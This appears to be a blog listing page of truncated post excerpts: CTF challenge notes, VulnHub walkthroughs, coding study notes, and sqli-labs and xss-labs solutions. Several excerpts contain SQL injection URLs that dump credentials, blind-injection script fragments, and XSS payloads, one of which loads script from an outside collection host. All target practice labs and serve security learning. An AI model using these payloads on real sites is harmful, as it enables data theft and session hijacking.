Original: CTF Challenge Notes 13

CISCN2019 North China Division Day1 Web1 Dropbox<!--phar--><?phpclass User { public $db;}class File{ public $filename;}class FileList{ private $files; public function __construct($path) { $file = new File(); $file-&gt

2022-05-01 22:34:54 268

Original: Thales

$ sudo nmap -sP 192.168.0.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-20 13:46 CSTNmap scan report for 192.168.0.1Host is up (0.00041s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report

2022-04-20 17:58:41 1340

Original: Python Study Notes: Multithreading

import _threadfrom time import sleep, ctimeloops = [4, 2]def loop(nloop, nsec, lock): print('start loop', nloop, 'at:', ctime()) sleep(nsec) print('loop', nloop, 'done at:', ctime()) lock.release()def main(): print('starting a

2022-04-20 12:46:29 751

Original: CTF Challenge Notes 12

[GYCTF2020]Blacklist?inject=1%27error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1?inject=1%27;show%20tables;#array(2) { [0]=>

2022-04-12 19:31:37 424

Original: CTF Challenge Notes 11

[HCTF 2018]adminimport sysimport zlibfrom flask.sessions import session_json_serializerfrom itsdangerous import base64_decodedef decryption(payload): payload, sig = payload.rsplit(b'.', 1) payload, timestamp = payload.rsplit(b'.', 1) d

2022-04-07 16:07:31 434

Original: Empire-Lupin-One

$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-06 20:21 CSTNmap scan report for 192.168.0.1Host is up (0.00036s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report fo

2022-04-06 22:06:53 6425

Original: Deathnote

$ sudo nmap -sP 192.168.0.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-05 14:35 CSTNmap scan report for 192.168.0.1Host is up (0.00050s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report f

2022-04-05 16:30:19 572

Original: CTF Challenge Notes 10

[ZJCTF 2019]NiZhuanSiWei?text=data://text/pain,welcome%20to%20the%20zjctf&file=php://filter/read=convert.base64-encode/resource=useless.phpwelcome to the zjctfPD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWM

2022-04-04 22:38:43 332

Original: Empire: Breakout

$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 16:54 CSTNmap scan report for 192.168.0.1Host is up (0.00054s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report fo

2022-04-04 13:16:17 558

Original: Jangow

$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( <https://nmap.org> ) at 2022-04-02 15:07 CSTNmap scan report for 192.168.0.1Host is up (0.00042s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan r

2022-04-02 16:44:01 621 1

Original: CTF Challenge Notes 9

[ACTF2020 Freshman Contest]BackupFile$ python3 dirsearch.py -e php,txt,zip,html -u http://d71ec916-0f16-4fea-b5ae-f1d1251aae5e.node4.buuoj.cn:81/ -t 40 --exclude-status 403,401[19:57:33] 200 - 347B - /index.php.bak?index.php?key=123[Geek Challenge 2019]PHP/www.zip&

2022-03-29 17:22:19 3534

Original: Earth

$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-27 02:19 CSTNmap scan report for 192.168.0.1Host is up (0.00047s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report fo

2022-03-28 23:05:33 898

Original: CTF Challenge Notes 8

[2022DASCTF]ezpop<?phpclass crow{ public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); }}class fin{ public $f1;

2022-03-27 14:15:51 729

Original: Napping

$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-26 19:25 CSTNmap scan report for 192.168.0.1Host is up (0.00040s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report fo

2022-03-26 20:36:28 663

Original: CTF Challenge Notes 7

[Huwang Cup 2018]easy_tornadohttp://73fdf6fb-85e6-41f4-a577-50bc91dd23c1.node4.buuoj.cn:81/error?msg={{22}}<html><head><style>body{font-size: 30px;}</style></head><body>22</body></html>http://73fdf6fb-85e6

2022-03-25 14:23:22 1165

Original: VulnHub: Red

$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-22 02:44 CSTNmap scan report for 192.168.0.1Host is up (0.00045s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report fo

2022-03-23 10:58:13 6273

Original: Web-Machine-N7

$ sudo nmap -sP 192.168.0.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 04:31 CSTNmap scan report for 192.168.0.1Host is up (0.00048s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report

2022-03-20 22:16:38 1873 1

Original: Os-ByteSec

$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-18 06:31 CSTNmap scan report for 192.168.0.1Host is up (0.00044s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report fo

2022-03-18 22:05:59 4897

Original: C++ Study Notes

Less-1:#include <iostream>using namespace std;int main(){ cout << "Hello World"; return 0;}Less-2 :#include<iostream>#include<limits>using namespace std;extern int a, b;extern int c;extern float f;int main(i

2022-03-16 12:36:55 763

Original: Python Script: MD5 Collision and HTML Escaping

import hashlibfor i in range(1,100000000000): s = hashlib.md5(str(i).encode("utf-8")).hexdigest()[0:6] if s == "184b43": print(i) breakin_str = "(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=3MGcX

2022-02-22 14:01:58 766

Original: CTF Challenge Notes 6

BUU XSS COURSE 1:</textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.buuoj.cn%2F3MGcXr%22%3B%28document.getElementsByTagName%28%22HEAD%22

2022-02-20 18:47:39 5062

Original: [Chapter 2: Advanced Web] XSS Challenges

Less-1:<script>alert('xss')</script>Less-2:';alert(1);'Less-3:'';alert(1);//Less-4:jumpUrl=javascript:alert('xss')Less-5:?autosubmit=1&action=javascript:alert(1)Less-6:{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} }

2022-02-20 13:27:44 558

Original: Xss-Labs Challenge Notes: Less-1 - Less-18

Leve-1:<script>alert('xss')</script>Leve-2:"><script>alert('xss')</script> //Leve-3:'οnfοcus=javascript:alert('xss') > // Leve-4:"οnfοcus=javascript:alert('xss') "Leve-5"><a href=javascript:alert('xss')>x

2022-02-14 19:04:48 204

Original: Xss-Labs Challenge Notes: Less-1 - Less-9

Leve-1:<script>alert('xss')</script>Leve-2:"><script>alert('xss')</script> //Leve-3:'οnfοcus=javascript:alert('xss') > //Leve-4:"οnfοcus=javascript:alert('xss') "Leve-5"><a href=javascript:alert('xss')>xs

2022-02-14 12:40:38 285

Original: Boolean Blind Injection: Grade Lookup

from aiohttp import Payloadfrom cherrypy import urlimport requestsimport timefrom sympy import parallel_poly_from_exprurl = "http://0cfdc5c8-c87c-4e7f-b632-7f6c6ff7a2d0.node4.buuoj.cn:81/?stunum="payload1 = "1^(ascii(substr((select(database())),{}

2022-02-13 09:22:48 3016

Original: CTF Challenge Notes 5

xctf-supersqli:?inject=-1';show databases;--+?inject=-1';show tables;--+?inject=-1';show columns from `1919810931114514`;--+?inject=-1';set @a= concat('sel','ect * from `1919810931114514`');prEpare stmt from @a;EXECUTE stmt;--+xctf-NewsCenter:1' uni

2022-01-27 15:22:17 3347

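Original: Sqli-Labs Challenge Notes: Less-1 - Less-65

sqli-labs study notes. SQL injection categories: Injection with echoed output: injection that allows UNION queries; error-based injection; injection that triggers a DNS request in order to get output echoed back. Injection without echoed output: Boolean blind injection; time-based blind injection; second-order injection. Universal statements: 1 or 1=1 – # 1’ or 1=1 – # 1" or 1=1 – # 1) or 1=1 – # 1’) or 1=1 – # 1") or 1=1 – # 1)) or 1=1 – # 1’) or 1=1-- # 1") or 1=1-- # Determining the closing delimiter: uname=1&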

2022-01-26 17:07:15 164

Original: Sqli-Labs Challenge Notes: Less-46 - Less-53

ORDER BY injection Less-46:localhost/sqlilabs/Less-46/?sort=1 and (updatexml(1,concat(0x5e24,(substr((select+group_concat(username,0x7e,password)+from+security.users),1)),0x7e),1))http://localhost/sqlilabs/Less-46/?sort=rand(ascii(mid((select%20group_concat(us

2022-01-26 11:40:46 2111

Original: Python Study Notes: Sequential Structure

Multiplication table:for i in range(1, 10): for j in range(1, i+1): print('{}*{}={}\t'.format(j, i, j*i), end='') print()Prime check:from numpy import appendnum = []i = 2for i in range(1, 300): for j in range(2, i): if(i % j == 0): b

2022-01-26 10:22:08 784

Original: Sqli-Labs Challenge Notes: Less-39 - Less-45

Less-39:http://localhost/sqlilabs/Less-39/?id=1;insert%20into%20users(id,username,password)%20values(69,%27joker%27,%27joker%27)--+Less-40:http://localhost/sqlilabs/Less-40/?id=2%27);insert%20into%20users(id,username,password)%20values(69,%27joker%27,%

2022-01-25 17:30:04 295

Original: Sqli-Labs Challenge Notes: Less-32 - Less-38

Wide-byte injection: Less-32:http://localhost/sqlilabs/Less-32/?id=-1%df%27%20union%20select%201,(select%0Agroup_concat(username)%0Afrom%0Asecurity.users),(select%0Agroup_concat(password)%0Afrom%0Asecurity.users);%00Less-33:http://localhost/sqlilabs/Less-33/?id=-1%d

2022-01-25 16:01:32 1004

Original: Sqli-Labs Challenge Notes: Less-27 - Less-31

Less-27:http://localhost/sqlilabs/Less-27/?id=0%27%0AUnIon%0ASelECT%0A1,(SeLeCT%0Agroup_concat(concat_ws(%27-%27,id,username,password))%0Afrom%0Ausers%0A%0A),3;%00Less-27ahttp://localhost/sqlilabs/Less-27a/?id=0%22%0AUnIon%0ASelECT%0A1,(SeLeCT%0Agroup_

2022-01-24 17:24:59 1671

Original: Sqli-Labs Challenge Notes: Less-21 - Less-26a

Bypasses: keyword filtering. Nested-keyword bypass: select selselctect, or oorr, union ununionion. Case switching: select SelECt, or Or, union uNIon. Hexadecimal conversion: select selec\x74, or o\x72, union unio\x6e. Double URL encoding: select %25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34

2022-01-23 23:50:14 530

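Original: Sqli-Labs Challenge Notes: Less-11 - Less-20

SQL injection categories: Injection with echoed output: injection that allows UNION queries; error-based injection; injection that triggers a DNS request in order to get output echoed back. Injection without echoed output: Boolean blind injection; time-based blind injection; second-order injection. Universal statements: 1 or 1=1 – # 1’ or 1=1 – # 1" or 1=1 – # 1) or 1=1 – # 1’) or 1=1 – # 1") or 1=1 – # 1)) or 1=1 – # 1’) or 1=1-- # 1") or 1=1-- # Determining the closing delimiter: uname=1&passwd=1 or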

2022-01-22 14:56:12 625

Original: Boolean Blind Injection Script

import requestschars = "qwertyuiopasdfghjklzxcvbnm0123456789}{"url = "http://localhost/sqli-labs-kali2-master/Less-15/"for x in range(0, 10): table_name = "" for y in range(1, 20): for char in chars: payload = {

2022-01-21 22:16:45 646

Original: Sqli-Labs Challenge Notes: Less-1 - Less-10

sqli-labsLess-1:http://localhost/sqli-labs-kali2-master/Less-1/?id=-1%27+union+select+1,group_concat(username),group_concat(password)+from+security.users+--+Less-2:http://localhost/sqli-labs-kali2-master/Less-2/?id=-1+union+select+1,group_concat(usern

2022-01-19 16:01:55 568

Original: PHP Study Notes: Array Search Example

<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Jo

2022-01-19 13:22:57 237

Original: PHP Study Notes: Arrays

<?php $person['age'] = 0; if ($person['age']) { echo "true!\n"; } if (array_key_exists('age', $person)) { echo "exists!\n"; } // exists! $subjects = array("physics", "chem", "math", "bio", "cs", "drama", "cla.

2022-01-18 11:47:35 188

Original: PHP Study Notes: Regular Expressions

<?php $message = <<< END To: you@youcorp From: me@mecorp Subject: pay up Pay me or else! END; preg_match("/^subject:(.*)/im",$message,$match); print_r($match); echo "<br />"; ?> <?php...

2022-01-16 14:42:21 165

Original: PHP Study Notes: Argument Counting

<!-- Argument counting --><!DOCTYPE html><html lang="en" dir="ltr"> <head> <meta charset="utf-8"> <title></title> </head> <body> <?php function countlist() { if(func_num_ar

2022-01-15 10:33:14 69
